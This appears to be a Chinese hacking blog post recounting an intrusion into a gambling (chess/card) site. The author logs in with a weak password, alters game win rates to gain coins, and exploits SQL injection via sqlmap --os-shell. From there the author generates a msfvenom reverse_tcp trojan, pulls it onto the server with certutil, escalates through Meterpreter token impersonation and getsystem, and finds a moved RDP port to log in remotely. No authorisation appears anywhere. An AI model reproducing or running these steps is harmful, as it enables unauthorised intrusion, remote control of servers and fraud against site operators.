![图片[1]-棋牌站点之提权-XSS博客](https://xsx.tw/wp-content/uploads/2024/08/d2b5ca33bd20240801204811.png)
![图片[2]-棋牌站点之提权-XSS博客](https://xsx.tw/wp-content/uploads/2024/08/d2b5ca33bd20240801204849.png)
开局一个后台
![图片[3]-棋牌站点之提权-XSS博客](https://xsx.tw/wp-content/uploads/2024/08/d2b5ca33bd20240801205501-1024x466.png)
界面挺不错的有点高级高级的感觉
咱先来试试弱口令
![图片[4]-棋牌站点之提权-XSS博客](https://xsx.tw/wp-content/uploads/2024/08/d2b5ca33bd20240801205450-1024x430.png)
咦….直接进去了
随后把账户的胜利调到了百分比
![图片[5]-棋牌站点之提权-XSS博客](https://xsx.tw/wp-content/uploads/2024/08/d2b5ca33bd20240801205611-1024x447.png)
![图片[6]-棋牌站点之提权-XSS博客](https://xsx.tw/wp-content/uploads/2024/08/d2b5ca33bd20240801205621.png)
打了一上午鱼之后,金币高达52w
突然感觉好像有点什么不对,,,,咱是来做渗透的不是来捕鱼的吧
渗透棋牌不登陆到服务器界面怎么合适呢
咳咳…继续渗透
后台没有上传点 配置文件也不知道路径在哪 …有点棘手
我们回到登陆框 在账户上加个单引号试试看看有没有sqli
![图片[7]-棋牌站点之提权-XSS博客](https://xsx.tw/wp-content/uploads/2024/08/d2b5ca33bd20240801205642-1024x460.png)
嗯哼..点登陆没反应抓包sqlmap一把梭
![图片[8]-棋牌站点之提权-XSS博客](https://xsx.tw/wp-content/uploads/2024/08/d2b5ca33bd20240801205657.png)
嗯…很强 存在延时注入
我们继续看看是否dba权限
![图片[9]-棋牌站点之提权-XSS博客](https://xsx.tw/wp-content/uploads/2024/08/d2b5ca33bd20240801205710.png)
ture看来运气很好啊 直接–os-shell
![图片[10]-棋牌站点之提权-XSS博客](https://xsx.tw/wp-content/uploads/2024/08/d2b5ca33bd20240801205729.png)
权限有点小啊 ,,,但问题不大 掏出我们的msf
msfvenom -p windows/meterpreter/reverse_tcp lhost=”外网ip地址” lport=”监听端口” -f exe > msf.exe 生成木马
放置外网方便使我们的目标服务器下载
先在目标服务器创建一个放置木马的文件夹
md c:\test
我们使用certutil.exe进行下载
certutil.exe -urlcache -split -f “木马下载地址” C:\test\test.exe
![图片[11]-棋牌站点之提权-XSS博客](https://xsx.tw/wp-content/uploads/2024/08/d2b5ca33bd20240801205745.png)
木马下载成功我们回到msf
设置使用exploit/multi/handler模块
![图片[12]-棋牌站点之提权-XSS博客](https://xsx.tw/wp-content/uploads/2024/08/d2b5ca33bd20240801205755.png)
设置payload
![图片[13]-棋牌站点之提权-XSS博客](https://xsx.tw/wp-content/uploads/2024/08/d2b5ca33bd20240801205808.png)
show options 看看需要配置的参数
![图片[14]-棋牌站点之提权-XSS博客](https://xsx.tw/wp-content/uploads/2024/08/d2b5ca33bd20240801205819.png)
set LHOST “外网ip” //于木马的ip一致
set LPORT “端口” //于木马的监听端口一致
随后 run执行
![图片[15]-棋牌站点之提权-XSS博客](https://xsx.tw/wp-content/uploads/2024/08/d2b5ca33bd20240801232454.png)
紧接着目标服务器运行木马
![图片[16]-棋牌站点之提权-XSS博客](https://xsx.tw/wp-content/uploads/2024/08/d2b5ca33bd20240801232527.png)
成功反弹shell
![图片[17]-棋牌站点之提权-XSS博客](https://xsx.tw/wp-content/uploads/2024/08/d2b5ca33bd20240801232541.png)
因为我们的权限太小所以我们现在要先进行提权
使用use incognito来加载会话令牌模块
然后list_tokens -u来列出会话令牌
![图片[18]-棋牌站点之提权-XSS博客](https://xsx.tw/wp-content/uploads/2024/08/d2b5ca33bd20240801232605.png)
使用impersonate_token “WIN-IGSV8O3CA7E\Administrator” 盗取 administrator 令牌 getuid查看一下
![图片[19]-棋牌站点之提权-XSS博客](https://xsx.tw/wp-content/uploads/2024/08/d2b5ca33bd20240801232619.png)
嘿嘿嘿
最最最后使用getsystem来获取system权限
![图片[20]-棋牌站点之提权-XSS博客](https://xsx.tw/wp-content/uploads/2024/08/d2b5ca33bd20240801232703.png)
咳咳 接下来就是shell进入
![图片[21]-棋牌站点之提权-XSS博客](https://xsx.tw/wp-content/uploads/2024/08/d2b5ca33bd20240801232710.png)
cmd提取命令一把梭
接下来就是快快乐乐的登陆远程服务器了
(然而事情没那么简单~)
咦….
![图片[22]-棋牌站点之提权-XSS博客](https://xsx.tw/wp-content/uploads/2024/08/d2b5ca33bd20240801232734.png)
内部出现错误 咋回事了….难道远程端口被改了吗。。。。
nmap出动扫描一下端口
![图片[23]-棋牌站点之提权-XSS博客](https://xsx.tw/wp-content/uploads/2024/08/d2b5ca33bd20240801232748.png)
没有开放3389 …… 确定以及肯定是改端口了我们回到shell看看
执行 tasklist /svc
找到svchost.exe进程下termservice服务对应的PID
![图片[24]-棋牌站点之提权-XSS博客](https://xsx.tw/wp-content/uploads/2024/08/d2b5ca33bd20240801232801.png)
再执行netstat -ano
根据PID号查找对应远程端口,远程端口为5566端口
![图片[25]-棋牌站点之提权-XSS博客](https://xsx.tw/wp-content/uploads/2024/08/d2b5ca33bd20240801232814.png)
嘿~这次能完美手工了吧
![图片[26]-棋牌站点之提权-XSS博客](https://xsx.tw/wp-content/uploads/2024/08/d2b5ca33bd20240801232829.png)
![图片[27]-棋牌站点之提权-XSS博客](https://xsx.tw/wp-content/uploads/2024/08/d2b5ca33bd20240801232839-1024x585.png)
Very Good~
![图片[28]-棋牌站点之提权-XSS博客](https://xsx.tw/wp-content/uploads/2024/08/d2b5ca33bd20240801232852.png)
暂无评论内容